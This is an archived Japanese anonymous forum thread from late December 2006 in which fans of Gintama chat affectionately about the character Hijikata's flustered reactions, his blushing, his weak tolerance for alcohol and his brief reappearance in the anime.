117 :名無しかわいいよ名無し:2006/12/27(水) 23:48:49 ID:IeGHdANF
土方って嘘つくぐらいなら、完全に黙りそうだよな。くだらない嘘はつくけど。

しゃくった時、照れ隠しに猪木やったら叩かれて逆ギレする所がゲーマーに
受けてた辺り、一般人から見てもからかい甲斐のある人なんだろうなw

118 :名無しかわいいよ名無し:2006/12/27(水) 23:59:52 ID:hkz78Wuf
リアクションがいちいちデカくて可愛いから、ついついからかいたくなっちゃうんだよ
すぐムキになるし

119 :名無しかわいいよ名無し:2006/12/28(木) 00:07:19 ID:l9KpOQPi
>>116
お通ちゃんの一日所長の時は抵抗ありありだったもんなw
でも逆にポニマヨ時代なら、ああいうのも平然とやってのけそうな気がする

でも土方って、照れたとしても
まだ一度だって赤面シーンは出てきてないよね?

120 :名無しかわいいよ名無し:2006/12/28(木) 00:30:23 ID:un+joT1A
>>119
> まだ一度だって赤面シーンは出てきてないよね?

花見で酔ったとき顔赤くなかったっけ?
ってどっちにしろ別物か…

121 :名無しかわいいよ名無し:2006/12/28(木) 00:33:15 ID:8BfUmpwJ
>>119
花見の時に酔っ払って赤くなってるのはあった筈だけど、羞恥に赤くなったのはないと思う
もしなっても必死に頬擦ったり俯いたりしてそう

122 :名無しかわいいよ名無し:2006/12/28(木) 00:43:27 ID:69I7m31z
>>119
照れた時赤くなる前にキレてるから

123 :名無しかわいいよ名無し:2006/12/28(木) 01:33:48 ID:7mASbwo2
>>122
照れ隠しでキレるのが可愛いんだ

124 :名無しかわいいよ名無し:2006/12/28(木) 01:47:39 ID:4xA+hdBS
反応がいちいちカワイイ
ドSコンビがちょっかい出したくなるのも分かるな

125 :名無しかわいいよ名無し:2006/12/28(木) 02:07:21 ID:69I7m31z
>>123
そう
だから抵抗感薄れるのは寂しい

126 :名無しかわいいよ名無し:2006/12/28(木) 02:10:30 ID:+jLFKZ5k
久しぶりに大晦日に皆でお出かけして、ちょっとはしゃいでるだけだと思いたい。

127 :名無しかわいいよ名無し:2006/12/28(木) 11:18:38 ID:Us74hD1f
>>126
大晦日ではしゃぐ土方wかわゆいなぁw甘酒奢ってあげたいよ

三回まわってわんの時の悔しそうで恥ずかしそうな土方可愛かったなw

128 :名無しかわいいよ名無し:2006/12/28(木) 15:38:57 ID:l9KpOQPi
>>120-122
いっそ、このまま照れてるところは態度だけで示して欲しい
酒以外では赤くならないタイプだといいな

>>127
恥ずかしそうなのもなんだが、三回回ってわんすら、かっこよく決めようとしたこの人が愛しすぎる
マヨラ13とあのシーンで、さらに土方好きになった自分としてはたまらんシーンだw

129 :名無しかわいいよ名無し:2006/12/28(木) 19:43:52 ID:l9KpOQPi
やばい…出るとは思わなかったから心の準備まったくしてなかったw
忘れてたので今日アニメで出てきた時、小躍りしたい気分でした

130 :名無しかわいいよ名無し:2006/12/28(木) 21:31:15 ID:Us74hD1f
>>129
トシ出たねw録画しといて良かった〜
少しだけど嬉しかったよやっぱりトシは美人だなぁ(*´Д`)
ツッコミも良かった!

131 :名無しかわいいよ名無し:2006/12/28(木) 21:40:25 ID:8BfUmpwJ
ああやって皆が飲んだりする中でも、一人警戒して飲まないから酒に弱くなったのかな

132 :名無しかわいいよ名無し:2006/12/29(金) 10:59:35 ID:MfAnA9po
>>131
生まれつき弱いんじゃない?多分そういう体質なんだと思う
土方は仕事熱心で偉いね真面目でカッコイイ

133 :名無しかわいいよ名無し:2006/12/29(金) 11:56:18 ID:aML6XnCY
>>131
それはそれで真面目可愛くて萌えるw


>>53を含め、前スレからの皆の願い(年内再登場)は叶ったわけだけど、土方さんは本当にマヨで釣れちゃうんだね
土方さんかわいいよ土方さん

134 :名無しかわいいよ名無し:2006/12/29(金) 16:52:01 ID:zlVKdP2N
本当に酒弱い人が花見のときの土方みたいな飲み方したら死ぬ。
つーかニオイかいだだけで吐く。

135 :名無しかわいいよ名無し:2006/12/29(金) 23:13:45 ID:uZWc/EBM
でも強くはないよな
銀さんともどもすぐに酔っぱらってたし
すぐに酔うがつぶれはしないって感じか

136 :名無しかわいいよ名無し:2006/12/29(金) 23:41:25 ID:pdLeRpCu
>>135
自販機の上で寝そべってたけどねw

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)